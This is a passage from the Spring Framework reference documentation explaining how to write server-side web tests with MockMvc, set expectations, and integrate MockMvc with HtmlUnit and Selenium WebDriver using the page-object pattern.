method:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tmockMvc.perform(post(\"\/hotels\/{id}\", 42).accept(MediaType.APPLICATION_JSON));\n----\n\nYou can also perform file upload requests that internally use\n`MockMultipartHttpServletRequest` so that there is no actual parsing of a multipart\nrequest but rather you have to set it up:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tmockMvc.perform(fileUpload(\"\/doc\").file(\"a1\", \"ABC\".getBytes(\"UTF-8\")));\n----\n\nYou can specify query parameters in URI template style:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tmockMvc.perform(get(\"\/hotels?foo={foo}\", \"bar\"));\n----\n\nOr you can add Servlet request parameters representing either query of form parameters:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tmockMvc.perform(get(\"\/hotels\").param(\"foo\", \"bar\"));\n----\n\nIf application code relies on Servlet request parameters and doesn't check the query\nstring explicitly (as is most often the case) then it doesn't matter which option you use.\nKeep in mind however that query params provided with the URI template will be decoded while\nrequest parameters provided through the `param(...)` method are expected to already be decoded.\n\nIn most cases it's preferable to leave out the context path and the Servlet path from\nthe request URI. If you must test with the full request URI, be sure to set the\n`contextPath` and `servletPath` accordingly so that request mappings will work:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tmockMvc.perform(get(\"\/app\/main\/hotels\/{id}\").contextPath(\"\/app\").servletPath(\"\/main\"))\n----\n\nLooking at the above example, it would be cumbersome to set the contextPath and\nservletPath with every performed request. Instead you can set up default request\nproperties:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class MyWebTests {\n\n\t\tprivate MockMvc mockMvc;\n\n\t\t@Before\n\t\tpublic void setup() {\n\t\t\tmockMvc = standaloneSetup(new AccountController())\n\t\t\t\t.defaultRequest(get(\"\/\")\n\t\t\t\t.contextPath(\"\/app\").servletPath(\"\/main\")\n\t\t\t\t.accept(MediaType.APPLICATION_JSON).build();\n\t\t}\n----\n\nThe above properties will affect every request performed through the `MockMvc` instance.\nIf the same property is also specified on a given request, it overrides the default value.\nThat is why the HTTP method and URI in the default request don't matter since they must be\nspecified on every request.\n\n[[spring-mvc-test-server-defining-expectations]]\n===== Defining Expectations\nExpectations can be defined by appending one or more `.andExpect(..)` calls after\nperforming a request:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tmockMvc.perform(get(\"\/accounts\/1\")).andExpect(status().isOk());\n----\n\n`MockMvcResultMatchers.*` provides a number of expectations, some of which are further\nnested with more detailed expectations.\n\nExpectations fall in two general categories. The first category of assertions verifies\nproperties of the response: for example, the response status, headers, and content. These\nare the most important results to assert.\n\nThe second category of assertions goes beyond the response. These assertions allow\none to inspect Spring MVC specific aspects such as which controller method processed\nthe request, whether an exception was raised and handled, what the content of the model\nis, what view was selected, what flash attributes were added, and so on. They also allow\none to inspect Servlet specific aspects such as request and session attributes.\n\nThe following test asserts that binding or validation failed:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tmockMvc.perform(post(\"\/persons\"))\n\t\t.andExpect(status().isOk())\n\t\t.andExpect(model().attributeHasErrors(\"person\"));\n----\n\nMany times when writing tests, it's useful to _dump_ the results of the performed request.\nThis can be done as follows, where `print()` is a static import from\n`MockMvcResultHandlers`:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tmockMvc.perform(post(\"\/persons\"))\n\t\t.andDo(print())\n\t\t.andExpect(status().isOk())\n\t\t.andExpect(model().attributeHasErrors(\"person\"));\n----\n\nAs long as request processing does not cause an unhandled exception, the `print()` method\nwill print all the available result data to `System.out`. Spring Framework 4.2 introduces\na `log()` method and two additional variants of the `print()` method, one that accepts\nan `OutputStream` and one that accepts a `Writer`. For example, invoking\n`print(System.err)` will print the result data to `System.err`; while invoking\n`print(myWriter)` will print the result data to a custom writer. If you would like to\nhave the result data _logged_ instead of printed, simply invoke the `log()` method which\nwill log the result data as a single `DEBUG` message under the\n`org.springframework.test.web.servlet.result` logging category.\n\nIn some cases, you may want to get direct access to the result and verify something that\ncannot be verified otherwise. This can be achieved by appending `.andReturn()` after all\nother expectations:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tMvcResult mvcResult = mockMvc.perform(post(\"\/persons\")).andExpect(status().isOk()).andReturn();\n\t\/\/ ...\n----\n\nIf all tests repeat the same expectations you can set up common expectations once\nwhen building the `MockMvc` instance:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tstandaloneSetup(new SimpleController())\n\t\t.alwaysExpect(status().isOk())\n\t\t.alwaysExpect(content().contentType(\"application\/json;charset=UTF-8\"))\n\t\t.build()\n----\n\nNote that common expectations are __always__ applied and cannot be overridden without\ncreating a separate `MockMvc` instance.\n\nWhen JSON response content contains hypermedia links created with\nhttps:\/\/github.com\/spring-projects\/spring-hateoas[Spring HATEOAS], the resulting links can\nbe verified using JsonPath expressions:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tmockMvc.perform(get(\"\/people\").accept(MediaType.APPLICATION_JSON))\n\t\t.andExpect(jsonPath(\"$.links[?(@.rel == 'self')].href\").value(\"http:\/\/localhost:8080\/people\"));\n----\n\nWhen XML response content contains hypermedia links created with\nhttps:\/\/github.com\/spring-projects\/spring-hateoas[Spring HATEOAS], the resulting links can\nbe verified using XPath expressions:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tMap<String, String> ns = Collections.singletonMap(\"ns\", \"http:\/\/www.w3.org\/2005\/Atom\");\n\tmockMvc.perform(get(\"\/handle\").accept(MediaType.APPLICATION_XML))\n\t\t.andExpect(xpath(\"\/person\/ns:link[@rel='self']\/@href\", ns).string(\"http:\/\/localhost:8080\/people\"));\n----\n\n[[spring-mvc-test-server-filters]]\n===== Filter Registrations\nWhen setting up a `MockMvc` instance, you can register one or more Servlet `Filter` instances:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tmockMvc = standaloneSetup(new PersonController()).addFilters(new CharacterEncodingFilter()).build();\n----\n\nRegistered filters will be invoked through via the `MockFilterChain` from `spring-test`, and the\nlast filter will delegate to the `DispatcherServlet`.\n\n[[spring-mvc-test-vs-end-to-end-integration-tests]]\n===== Differences between Out-of-Container and End-to-End Integration Tests\n\nAs mentioned earlier __Spring MVC Test__ is built on the Servlet API mock objects from\nthe `spring-test` module and does not use a running Servlet container. Therefore\nthere are some important differences compared to full end-to-end integration tests\nwith an actual client and server running.\n\nThe easiest way to think about this is starting with a blank `MockHttpServletRequest`.\nWhatever you add to it is what the request will be. Things that may catch you by surprise\nare that there is no context path by default, no `jsessionid` cookie, no forwarding, error,\nor async dispatches, and therefore no actual JSP rendering. Instead, \"forwarded\" and\n\"redirected\" URLs are saved in the `MockHttpServletResponse` and can be asserted with\nexpectations.\n\nThis means if you are using JSPs you can verify the JSP page to which the request was\nforwarded, but there won't be any HTML rendered. In other words, the JSP will not be\n_invoked_. Note however that all other rendering technologies which don't rely on\nforwarding such as Thymeleaf, Freemarker, and Velocity will render HTML to the response\nbody as expected. The same is true for rendering JSON, XML, and other formats via\n`@ResponseBody` methods.\n\nAlternatively you may consider the full end-to-end integration testing support from\nSpring Boot via `@WebIntegrationTest`. See the\n{doc-spring-boot}\/html\/boot-features-testing.html#boot-features-testing-spring-boot-applications[Spring Boot reference].\n\nThere are pros and cons for each approach. The options provided in __Spring MVC Test__\nare different stops on the scale from classic unit testing to full integration testing.\nTo be certain, none of the options in Spring MVC Test fall under the category of classic\nunit testing, but they _are_ a little closer to it. For example, you can isolate the web\nlayer by injecting mocked services into controllers, in which case you're testing the web\nlayer only through the `DispatcherServlet` but with actual Spring configuration, just\nlike you might test the data access layer in isolation from the layers above. Or you\ncan use the standalone setup focusing on one controller at a time and manually providing\nthe configuration required to make it work.\n\nAnother important distinction when using __Spring MVC Test__ is that conceptually such\ntests are on the _inside_ of the server-side so you can check what handler was used,\nif an exception was handled with a HandlerExceptionResolver, what the content of the\nmodel is, what binding errors there were, etc. That means it's easier to write\nexpectations since the server is not a black box as it is when testing it through\nan actual HTTP client. This is generally an advantage of classic unit testing, that it's\neasier to write, reason about, and debug but does not replace the need for full\nintegration tests. At the same time it's important not to lose sight of the fact that\nthe response is the most important thing to check. In short, there is room here for\nmultiple styles and strategies of testing even within the same project.\n\n\n[[spring-mvc-test-server-resources]]\n===== Further Server-Side Test Examples\nThe framework's own tests include\nhttps:\/\/github.com\/spring-projects\/spring-framework\/tree\/master\/spring-test\/src\/test\/java\/org\/springframework\/test\/web\/servlet\/samples[many\nsample tests] intended to demonstrate how to use Spring MVC Test. Browse these examples\nfor further ideas. Also the\nhttps:\/\/github.com\/spring-projects\/spring-mvc-showcase[spring-mvc-showcase] has full test\ncoverage based on Spring MVC Test.\n\n\n[[spring-mvc-test-server-htmlunit]]\n==== HtmlUnit Integration\n\nSpring provides integration between <<spring-mvc-test-server,MockMvc>> and\nhttp:\/\/htmlunit.sourceforge.net\/[HtmlUnit]. This simplifies performing end-to-end testing\nwhen using HTML based views. This integration enables developers to:\n\n* Easily test HTML pages using tools such as http:\/\/htmlunit.sourceforge.net\/[HtmlUnit],\nhttp:\/\/seleniumhq.org\/projects\/webdriver\/[WebDriver], &\nhttp:\/\/www.gebish.org\/manual\/current\/testing.html#spock_junit__testng[Geb] without the\nneed to deploy to a Servlet container\n* Test JavaScript within pages\n* Optionally test using mock services to speed up testing\n* Share logic between in-container end-to-end tests and out-of-container integration tests\n\n[NOTE]\n====\n`MockMvc` works with templating technologies that do not rely on a Servlet Container (e.g.,\nThymeleaf, Freemarker, Velocity, etc.), but it does not work with JSPs since they rely on\nthe Servlet Container.\n====\n\n[[spring-mvc-test-server-htmlunit-why]]\n===== Why HtmlUnit Integration?\n\nThe most obvious question that comes to mind is, \"Why do I need this?\". The answer is best\nfound by exploring a very basic sample application. Assume you have a Spring MVC web\napplication that supports CRUD operations on a `Message` object. The application also supports\npaging through all messages. How would you go about testing it?\n\nWith Spring MVC Test, we can easily test if we are able to create a `Message`.\n\n[source,java]\n----\nMockHttpServletRequestBuilder createMessage = post(\"\/messages\/\")\n\t.param(\"summary\", \"Spring Rocks\")\n\t.param(\"text\", \"In case you didn't know, Spring Rocks!\");\n\nmockMvc.perform(createMessage)\n\t.andExpect(status().is3xxRedirection())\n\t.andExpect(redirectedUrl(\"\/messages\/123\"));\n----\n\nWhat if we want to test our form view that allows us to create the message? For example,\nassume our form looks like the following snippet:\n\n[source,xml]\n----\n<form id=\"messageForm\" action=\"\/messages\/\" method=\"post\">\n <div class=\"pull-right\"><a href=\"\/messages\/\">Messages<\/a><\/div>\n\n <label for=\"summary\">Summary<\/label>\n <input type=\"text\" class=\"required\" id=\"summary\" name=\"summary\" value=\"\" \/>\n\n <label for=\"text\">Message<\/label>\n <textarea id=\"text\" name=\"text\"><\/textarea>\n\n <div class=\"form-actions\">\n\t<input type=\"submit\" value=\"Create\" \/>\n <\/div>\n<\/form>\n----\n\nHow do we ensure that our form will produce the correct request to create a new message? A\nnaive attempt would look like this:\n\n[source,java]\n----\nmockMvc.perform(get(\"\/messages\/form\"))\n\t.andExpect(xpath(\"\/\/input[@name='summary']\").exists())\n\t.andExpect(xpath(\"\/\/textarea[@name='text']\").exists());\n----\n\nThis test has some obvious drawbacks. If we update our controller to use the parameter\n`message` instead of `text`, our form test would continue to pass even though the HTML\nform is out of synch with the controller. To resolve this we can combine our two tests.\n\n[[spring-mvc-test-server-htmlunit-mock-mvc-test]]\n[source,java]\n----\nString summaryParamName = \"summary\";\nString textParamName = \"text\";\nmockMvc.perform(get(\"\/messages\/form\"))\n\t\t.andExpect(xpath(\"\/\/input[@name='\" + summaryParamName + \"']\").exists())\n\t\t.andExpect(xpath(\"\/\/textarea[@name='\" + textParamName + \"']\").exists());\n\nMockHttpServletRequestBuilder createMessage = post(\"\/messages\/\")\n\t\t.param(summaryParamName, \"Spring Rocks\")\n\t\t.param(textParamName, \"In case you didn't know, Spring Rocks!\");\n\nmockMvc.perform(createMessage)\n\t\t.andExpect(status().is3xxRedirection())\n\t\t.andExpect(redirectedUrl(\"\/messages\/123\"));\n----\n\nThis would reduce the risk of our test incorrectly passing, but there are still some\nproblems.\n\n* What if we have multiple forms on our page? Admittedly we could update our xpath\n expressions, but they get more complicated the more factors we take into account (Are the\n fields the correct type? Are the fields enabled? etc.).\n* Another issue is that we are doing double the work we would expect.\n We must first verify the view, and then we submit the view with the same parameters we just\n verified. Ideally this could be done all at once.\n* Finally, there are some things that we still cannot account for. For example, what if the\n form has JavaScript validation that we wish to test as well?\n\nThe overall problem is that testing a web page does not involve a single interaction.\nInstead, it is a combination of how the user interacts with a web page and how that web\npage interacts with other resources. For example, the result of a form view is used as\nthe input to a user for creating a message. In addition, our form view may potentially\nutilize additional resources which impact the behavior of the page, such as JavaScript\nvalidation.\n\n[[spring-mvc-test-server-htmlunit-why-integration]]\n====== Integration testing to the rescue?\n\nTo resolve the issues above we could perform end-to-end integration testing, but this has\nsome obvious drawbacks. Consider testing the view that allows us to page through the messages.\nWe might need the following tests.\n\n* Does our page display a notification to the user indicating that no results are available\nwhen the messages are empty?\n* Does our page properly display a single message?\n* Does our page properly support paging?\n\nTo set up these tests, we would need to ensure our database contained the proper messages\nin it. This leads to a number of additional challenges.\n\n* Ensuring the proper messages are in the database can be tedious; consider foreign key\n constraints.\n* Testing can become slow since each test would need to ensure that the database is in the\n correct state.\n* Since our database needs to be in a specific state, we cannot run tests in parallel.\n* Performing assertions on things like auto-generated ids, timestamps, etc. can be difficult.\n\nThese challenges do not mean that we should abandon end-to-end integration testing\naltogether. Instead, we can reduce the number of end-to-end integration tests by\nrefactoring our detailed tests to use mock services which will execute much faster, more\nreliably, and without side effects. We can then implement a small number of _true_\nend-to-end integration tests that validate simple workflows to ensure that everything\nworks together properly.\n\n[[spring-mvc-test-server-htmlunit-why-mockmvc]]\n====== Enter HtmlUnit Integration\n\nSo how can we achieve a balance between testing the interactions of our pages and still\nretain good performance within our test suite? The answer is: \"By integrating MockMvc\nwith HtmlUnit.\"\n\n[[spring-mvc-test-server-htmlunit-options]]\n====== HtmlUnit Integration Options\n\nThere are a number of ways to integrate `MockMvc` with HtmlUnit.\n\n* <<spring-mvc-test-server-htmlunit-mah,MockMvc and HtmlUnit>>: Use this option if you\nwant to use the raw HtmlUnit libraries.\n* <<spring-mvc-test-server-htmlunit-webdriver,MockMvc and WebDriver>>: Use this option to\nease development and reuse code between integration and end-to-end testing.\n* <<spring-mvc-test-server-htmlunit-geb,MockMvc and Geb>>: Use this option if you would\nlike to use Groovy for testing, ease development, and reuse code between integration and\nend-to-end testing.\n\n[[spring-mvc-test-server-htmlunit-mah]]\n===== MockMvc and HtmlUnit\n\nThis section describes how to integrate `MockMvc` and HtmlUnit. Use this option if you\nwant to use the raw HtmlUnit libraries.\n\n[[spring-mvc-test-server-htmlunit-mah-setup]]\n====== MockMvc and HtmlUnit Setup\n\nFirst, make sure that you have included a test dependency on `net.sourceforge.htmlunit:htmlunit`.\nIn order to use HtmlUnit with Apache HttpComponents 4.5+, you will need to use HtmlUnit\n2.18 or higher.\n\nWe can easily create an HtmlUnit `WebClient` that integrates with `MockMvc` using the\n`MockMvcWebClientBuilder` as follows.\n\n[source,java]\n----\n@Autowired\nWebApplicationContext context;\n\nWebClient webClient;\n\n@Before\npublic void setup() {\n\twebClient = MockMvcWebClientBuilder\n\t\t.webAppContextSetup(context)\n\t\t.build();\n}\n----\n\n[NOTE]\n====\nThis is a simple example of using `MockMvcWebClientBuilder`. For advanced usage see\n<<Advanced MockMvcWebClientBuilder>>\n====\n\nThis will ensure that any URL referencing `localhost` as the server will be directed to\nour `MockMvc` instance without the need for a real HTTP connection. Any other URL will be\nrequested using a network connection as normal. This allows us to easily test the use of\nCDNs.\n\n[[spring-mvc-test-server-htmlunit-mah-usage]]\n====== MockMvc and HtmlUnit Usage\n\nNow we can use HtmlUnit as we normally would, but without the need to deploy our\napplication to a Servlet container. For example, we can request the view to create\na message with the following.\n\n[source,java]\n----\nHtmlPage createMsgFormPage = webClient.getPage(\"http:\/\/localhost\/messages\/form\");\n----\n\n[NOTE]\n====\nThe default context path is `\"\"`. Alternatively, we can specify the context path as\nillustrated in <<Advanced MockMvcWebClientBuilder>>.\n====\n\nOnce we have a reference to the `HtmlPage`, we can then fill out the form and submit\nit to create a message.\n\n[source,java]\n----\nHtmlForm form = createMsgFormPage.getHtmlElementById(\"messageForm\");\nHtmlTextInput summaryInput = createMsgFormPage.getHtmlElementById(\"summary\");\nsummaryInput.setValueAttribute(\"Spring Rocks\");\nHtmlTextArea textInput = createMsgFormPage.getHtmlElementById(\"text\");\ntextInput.setText(\"In case you didn't know, Spring Rocks!\");\nHtmlSubmitInput submit = form.getOneHtmlElementByAttribute(\"input\", \"type\", \"submit\");\nHtmlPage newMessagePage = submit.click();\n----\n\nFinally, we can verify that a new message was created successfully. The following\nassertions use the http:\/\/joel-costigliola.github.io\/assertj\/[AssertJ] library.\n\n[source,java]\n----\nassertThat(newMessagePage.getUrl().toString()).endsWith(\"\/messages\/123\");\nString id = newMessagePage.getHtmlElementById(\"id\").getTextContent();\nassertThat(id).isEqualTo(\"123\");\nString summary = newMessagePage.getHtmlElementById(\"summary\").getTextContent();\nassertThat(summary).isEqualTo(\"Spring Rocks\");\nString text = newMessagePage.getHtmlElementById(\"text\").getTextContent();\nassertThat(text).isEqualTo(\"In case you didn't know, Spring Rocks!\");\n----\n\nThis improves on our <<spring-mvc-test-server-htmlunit-mock-mvc-test,MockMvc test>> in a\nnumber of ways. First we no longer have to explicitly verify our form and then create a\nrequest that looks like the form. Instead, we request the form, fill it out, and submit\nit, thereby significantly reducing the overhead.\n\nAnother important factor is that http:\/\/htmlunit.sourceforge.net\/javascript.html[HtmlUnit\nuses the Mozilla Rhino engine] to evaluate JavaScript. This means that we can test the\nbehavior of JavaScript within our pages as well!\n\nRefer to the http:\/\/htmlunit.sourceforge.net\/gettingStarted.html[HtmlUnit documentation]\nfor additional information about using HtmlUnit.\n\n[[spring-mvc-test-server-htmlunit-mah-advanced-builder]]\n====== Advanced MockMvcWebClientBuilder\n\nIn the examples so far, we have used `MockMvcWebClientBuilder` in the simplest way possible,\nby building a `WebClient` based on the `WebApplicationContext` loaded for us by the Spring\nTestContext Framework. This approach is repeated here.\n\n[source,java]\n----\n@Autowired\nWebApplicationContext context;\n\nWebClient webClient;\n\n@Before\npublic void setup() {\n\twebClient = MockMvcWebClientBuilder\n\t\t.webAppContextSetup(context)\n\t\t.build();\n}\n----\n\nWe can also specify additional configuration options.\n\n[source,java]\n----\nWebClient webClient;\n\n@Before\npublic void setup() {\n\twebClient = MockMvcWebClientBuilder\n\t\t\/\/ demonstrates applying a MockMvcConfigurer (Spring Security)\n\t\t.webAppContextSetup(context, springSecurity())\n\t\t\/\/ for illustration only - defaults to \"\"\n\t\t.contextPath(\"\")\n\t\t\/\/ By default MockMvc is used for localhost only;\n\t\t\/\/ the following will use MockMvc for example.com and example.org as well\n\t\t.useMockMvcForHosts(\"example.com\",\"example.org\")\n\t\t.build();\n}\n----\n\nAs an alternative, we can perform the exact same setup by configuring the `MockMvc`\ninstance separately and supplying it to the `MockMvcWebClientBuilder` as follows.\n\n[source,java]\n----\nMockMvc mockMvc = MockMvcBuilders\n\t\t.webAppContextSetup(context)\n\t\t.apply(springSecurity())\n\t\t.build();\n\nwebClient = MockMvcWebClientBuilder\n\t\t.mockMvcSetup(mockMvc)\n\t\t\/\/ for illustration only - defaults to \"\"\n\t\t.contextPath(\"\")\n\t\t\/\/ By default MockMvc is used for localhost only;\n\t\t\/\/ the following will use MockMvc for example.com and example.org as well\n\t\t.useMockMvcForHosts(\"example.com\",\"example.org\")\n\t\t.build();\n----\n\nThis is more verbose, but by building the `WebClient` with a `MockMvc` instance we have\nthe full power of `MockMvc` at our fingertips.\n\n[TIP]\n====\nFor additional information on creating a `MockMvc` instance refer to\n<<spring-mvc-test-server-setup-options>>.\n====\n\n[[spring-mvc-test-server-htmlunit-webdriver]]\n===== MockMvc and WebDriver\n\nIn the previous sections, we have seen how to use `MockMvc` in conjunction with the raw\nHtmlUnit APIs. In this section, we will leverage additional abstractions within the Selenium\nhttp:\/\/docs.seleniumhq.org\/projects\/webdriver\/[WebDriver] to make things even easier.\n\n[[spring-mvc-test-server-htmlunit-webdriver-why]]\n====== Why WebDriver and MockMvc?\n\nWe can already use HtmlUnit and `MockMvc`, so why would we want to use `WebDriver`? The\nSelenium `WebDriver` provides a very elegant API that allows us to easily organize our code.\nTo better understand, let's explore an example.\n\n[NOTE]\n====\nDespite being a part of http:\/\/docs.seleniumhq.org\/[Selenium], WebDriver does not require\na Selenium Server to run your tests.\n====\n\nSuppose we need to ensure that a message is created properly. The tests involve finding\nthe HTML form input elements, filling them out, and making various assertions.\n\nThis approach results in numerous, separate tests because we want to test error\nconditions as well. For example, we want to ensure that we get an error if we fill out\nonly part of the form. If we fill out the entire form, the newly created message should\nbe displayed afterwards.\n\nIf one of the fields were named \"summary\", then we might have something like the\nfollowing repeated in multiple places within our tests.\n\n[source,java]\n----\nHtmlTextInput summaryInput = currentPage.getHtmlElementById(\"summary\");\nsummaryInput.setValueAttribute(summary);\n----\n\nSo what happens if we change the `id` to \"smmry\"? Doing so would force us to update all\nof our tests to incorporate this change! Of course, this violates the _DRY Principle_; so\nwe should ideally extract this code into its own method as follows.\n\n[source,java]\n----\npublic HtmlPage createMessage(HtmlPage currentPage, String summary, String text) {\n\tsetSummary(currentPage, summary);\n\t\/\/ ...\n}\n\npublic void setSummary(HtmlPage currentPage, String summary) {\n\tHtmlTextInput summaryInput = currentPage.getHtmlElementById(\"summary\");\n\tsummaryInput.setValueAttribute(summary);\n}\n----\n\nThis ensures that we do not have to update all of our tests if we change the UI.\n\nWe might even take this a step further and place this logic within an Object that\nrepresents the `HtmlPage` we are currently on.\n\n[source,java]\n----\npublic class CreateMessagePage {\n\n\tfinal HtmlPage currentPage;\n\n\tfinal HtmlTextInput summaryInput;\n\n\tfinal HtmlSubmitInput submit;\n\n\tpublic CreateMessagePage(HtmlPage currentPage) {\n\t\tthis.currentPage = currentPage;\n\t\tthis.summaryInput = currentPage.getHtmlElementById(\"summary\");\n\t\tthis.submit = currentPage.getHtmlElementById(\"submit\");\n\t}\n\n\tpublic <T> T createMessage(String summary, String text) throws Exception {\n\t\tsetSummary(summary);\n\n\t\tHtmlPage result = submit.click();\n\t\tboolean error = CreateMessagePage.at(result);\n\n\t\treturn (T) (error ? new CreateMessagePage(result) : new ViewMessagePage(result));\n\t}\n\n\tpublic void setSummary(String summary) throws Exception {\n\t\tsummaryInput.setValueAttribute(summary);\n\t}\n\n\tpublic static boolean at(HtmlPage page) {\n\t\treturn \"Create Message\".equals(page.getTitleText());\n\t}\n}\n----\n\nFormerly, this pattern is known as the\nhttps:\/\/code.google.com\/p\/selenium\/wiki\/PageObjects[Page Object Pattern]. While we can\ncertainly do this with HtmlUnit, WebDriver provides some tools that we will explore in the\nfollowing sections to make this pattern much easier to implement.\n\n[[spring-mvc-test-server-htmlunit-webdriver-setup]]\n====== MockMvc and WebDriver Setup\n\nTo use Selenium WebDriver with the Spring MVC Test framework, make sure that your project\nincludes a test dependency on `org.seleniumhq.selenium:selenium-htmlunit-driver`.\n\nWe can easily create a Selenium `WebDriver` that integrates with `MockMvc` using the\n`MockMvcHtmlUnitDriverBuilder` as follows.\n\n[source,java]\n----\n@Autowired\nWebApplicationContext context;\n\nWebDriver driver;\n\n@Before\npublic void setup() {\n\tdriver = MockMvcHtmlUnitDriverBuilder\n\t\t.webAppContextSetup(context)\n\t\t.build();\n}\n----\n\n[NOTE]\n====\nThis is a simple example of using `MockMvcHtmlUnitDriverBuilder`.\nFor more advanced usage, refer to <<Advanced MockMvcHtmlUnitDriverBuilder>>\n====\n\nThis will ensure that any URL referencing `localhost` as the server will be directed to\nour `MockMvc` instance without the need for a real HTTP connection. Any other URL will be\nrequested using a network connection as normal. This allows us to easily test the use of\nCDNs.\n\n[[spring-mvc-test-server-htmlunit-webdriver-usage]]\n====== MockMvc and WebDriver Usage\n\nNow we can use WebDriver as we normally would, but without the need to deploy our\napplication to a Servlet container. For example, we can request the view to create\na message with the following.\n\n[source,java]\n----\nCreateMessagePage page = CreateMessagePage.to(driver);\n----\n\nWe can then fill out the form and submit it to create a message.\n\n[source,java]\n----\nViewMessagePage viewMessagePage =\n\tpage.createMessage(ViewMessagePage.class, expectedSummary, expectedText);\n----\n\nThis improves on the design of our\n<<spring-mvc-test-server-htmlunit-mah-usage,HtmlUnit test>> by leveraging the _Page Object\nPattern_. As we mentioned in <<spring-mvc-test-server-htmlunit-webdriver-why>>, we can\nuse the Page Object Pattern with HtmlUnit, but it is much easier with WebDriver. Let's\ntake a look at our new `CreateMessagePage` implementation.\n\n[source,java]\n----\npublic class CreateMessagePage\n\t\textends AbstractPage { \/\/ <1>\n\n\t\/\/ <2>\n\tprivate WebElement summary;\n\tprivate WebElement text;\n\n\t\/\/ <3>\n\t@FindBy(css = \"input[type=submit]\")\n\tprivate WebElement submit;\n\n\tpublic CreateMessagePage(WebDriver driver) {\n\t\tsuper(driver);\n\t}\n\n\tpublic <T> T createMessage(Class<T> resultPage, String summary, String details) {\n\t\tthis.summary.sendKeys(summary);\n\t\tthis.text.sendKeys(details);\n\t\tthis.submit.click();\n\t\treturn PageFactory.initElements(driver, resultPage);\n\t}\n\n\tpublic static CreateMessagePage to(WebDriver driver) {\n\t\tdriver.get(\"http:\/\/localhost:9990\/mail\/messages\/form\");\n\t\treturn PageFactory.initElements(driver, CreateMessagePage.class);\n\t}\n}\n----\n\n<1> The first thing you will notice is that `CreateMessagePage` extends the\n`AbstractPage`. We won't go over the details of `AbstractPage`, but in summary it\ncontains common functionality for all of our pages. For example, if our application has\na navigational bar, global error messages, etc., this logic can be placed in a shared\nlocation.\n\n<2> The next thing you will notice is that we have a member variable for each of the\nparts of the HTML page that we are interested in. These are of type `WebElement`.\n``WebDriver``'s https:\/\/code.google.com\/p\/selenium\/wiki\/PageFactory[PageFactory] allows\nus to remove a lot of code from the HtmlUnit version of `CreateMessagePage` by\nautomatically resolving each `WebElement`. The\nhttp:\/\/selenium.googlecode.com\/git\/docs\/api\/java\/org\/openqa\/selenium\/support\/PageFactory.html#initElements-org.openqa.selenium.WebDriver-java.lang.Class-[PageFactory#initElements(WebDriver,Class<T>)]\nmethod will automatically resolve each `WebElement` by using the field name and looking it\nup by the `id` or `name` of the element within the HTML page.\n\n<3> We can use the\nhttps:\/\/code.google.com\/p\/selenium\/wiki\/PageFactory#Making_the_Example_Work_Using_Annotations[@FindBy annotation]\nto override the default lookup behavior. Our example demonstrates how to use the `@FindBy`\nannotation to look up our submit button using a css selector, *input[type=submit]*.\n\nFinally, we can verify that a new message was created successfully. The following\nassertions use the https:\/\/code.google.com\/p\/fest\/[FEST assertion library].\n\n[source,java]\n----\nassertThat(viewMessagePage.getMessage()).isEqualTo(expectedMessage);\nassertThat(viewMessagePage.getSuccess()).isEqualTo(\"Successfully created a new message\");\n----\n\nWe can see that our `ViewMessagePage` allows us to interact with our custom domain\nmodel. For example, it exposes a method that returns a `Message` object.\n\n[source,java]\n----\npublic Message getMessage() throws ParseException {\n\tMessage message = new Message();\n\tmessage.setId(getId());\n\tmessage.setCreated(getCreated());\n\tmessage.setSummary(getSummary());\n\tmessage.setText(getText());\n\treturn message;\n}\n----\n\nWe can then leverage the rich domain objects in our assertions.\n\nLastly, don't forget to _close_ the `WebDriver` instance when the test is complete.\n\n[source,java]\n----\n@After\npublic void destroy() {\n\tif (driver != null) {\n\t\tdriver.close();\n\t}\n}\n----\n\nFor additional information on using WebDriver, refer to the Selenium\nhttps:\/\/code.google.com\/p\/selenium\/wiki\/GettingStarted[WebDriver documentation].\n\n[[spring-mvc-test-server-htmlunit-webdriver-advanced-builder]]\n====== Advanced MockMvcHtmlUnitDriverBuilder\n\nIn the examples so far, we have used `MockMvcHtmlUnitDriverBuilder` in the simplest way\npossible, by building a `WebDriver` based on the `WebApplicationContext` loaded for us by\nthe Spring TestContext Framework. This approach is repeated here.\n\n[source,java]\n----\n@Autowired\nWebApplicationContext context;\n\nWebDriver driver;\n\n@Before\npublic void setup() {\n\tdriver = MockMvcHtmlUnitDriverBuilder\n\t\t.webAppContextSetup(context)\n\t\t.build();\n}\n----\n\nWe can also specify additional configuration options.\n\n[source,java]\n----\nWebDriver driver;\n\n@Before\npublic void setup() {\n\tdriver = MockMvcHtmlUnitDriverBuilder\n\t\t\/\/ demonstrates applying a MockMvcConfigurer (Spring Security)\n\t\t.webAppContextSetup(context, springSecurity())\n\t\t\/\/ for illustration only - defaults to \"\"\n\t\t.contextPath(\"\")\n\t\t\/\/ By default MockMvc is used for localhost only;\n\t\t\/\/ the following will use MockMvc for example.com and example.org as well\n\t\t.useMockMvcForHosts(\"example.com\",\"example.org\")\n\t\t.build();\n}\n----\n\nAs an alternative, we can perform the exact same setup by configuring the `MockMvc`\ninstance separately and supplying it to the `MockMvcHtmlUnitDriverBuilder` as follows.\n\n[source,java]\n----\nMockMvc mockMvc = MockMvcBuilders\n\t\t.webAppContextSetup(context)\n\t\t.apply(springSecurity())\n\t\t.build();\n\ndriver = MockMvcHtmlUnitDriverBuilder\n\t\t.mockMvcSetup(mockMvc)\n\t\t\/\/ for illustration only - defaults to \"\"\n\t\t.contextPath(\"\")\n\t\t\/\/ By default MockMvc is used for localhost only;\n\t\t\/\/ the following will use MockMvc for example.com and example.org as 